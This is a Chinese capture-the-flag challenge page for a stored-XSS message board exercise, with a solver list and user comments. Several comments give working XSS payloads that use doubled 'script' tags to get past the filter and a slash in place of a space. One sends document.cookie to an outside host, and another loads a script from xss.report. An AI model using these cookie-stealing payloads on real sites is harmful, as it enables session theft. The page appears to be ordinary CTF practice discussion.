留言板1WEB 未解决
分数:
20
金币:
3
题目作者:
harry
一 血:
18256197318
一血奖励:
5金币
解 决:
212
提 示:
需要xss平台接收flag
描 述:
flag{}
评分(3)
解题动态
edadsadw 攻破了该题 16天前
小白RM 攻破了该题 16天前
wdfctf 攻破了该题 16天前
2523822945 攻破了该题 23天前
Anna-july 攻破了该题 25天前
wujita01 攻破了该题 26天前
XavierSilas 攻破了该题 1月前
kr2yh 攻破了该题 1月前
seyana 攻破了该题 1月前
scofield 攻破了该题 1月前
lee8ly 攻破了该题 1月前
沧颜 攻破了该题 1月前
hyj11125 攻破了该题 1月前
小马哥 攻破了该题 1月前
xiaomenghua 攻破了该题 2月前
jaysongong 攻破了该题 2月前
Knyhs 攻破了该题 2月前
小卢不太聪明呀 攻破了该题 2月前
li0706 攻破了该题 2月前
评论
小白RM 16天前
举报
三战,最后直接在当前页面执行了 location.href 跳转,并且用双写绕过关键词过滤 使用自建平台<scscriptript>location.href="http://www.iytzx.com/****/?cookie="+document.cookie</scscriptript>成功接收到flag
kr2yh 1月前
举报
<scriscriptpt/src=https://xss.report/c/kr2yh></scriscriptpt> 双写加/代替空格 就可以
十里故清云 2月前
举报
在线蹲大手子,只能靠自建vps公网ip收吗?? 现在还有xss平台能收吗(我已急哭)
qq1002517 2月前
举报
flag{**********}
网恋秀牛子被录屏导致自卑 4月前
举报
我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag。 这题是script双写绕过,空格用斜杠代替
十里故清云 2月前
举报
用双写绕过和空格了,还是收不到啊...
dlgz 9月前
举报
公网上的xss平台没找到http的,自己搭了一个测试的成功了。
Kr1smi1e 10月前
举报
题目确实没问题,可以参考:https://blog.csdn.net/weixin_74357882/article/details/149303799?sharetype=blogdetail&sharerId=149303799&sharerefer=PC&sharesource=weixin_74357882&spm=1011.2480.3001.8118
iNMB 10月前
举报
垃圾题目,输入的js根本没有回显。使用浏览器看cookies发现flag,结果上传flag说我flag错误。
llc123 1年前
举报
根本收不到,还以为你加了什么限制,花5金币看你wp等于白看
kl01 1年前
举报
试了几个xss平台收不到 自己没服务器溜了溜了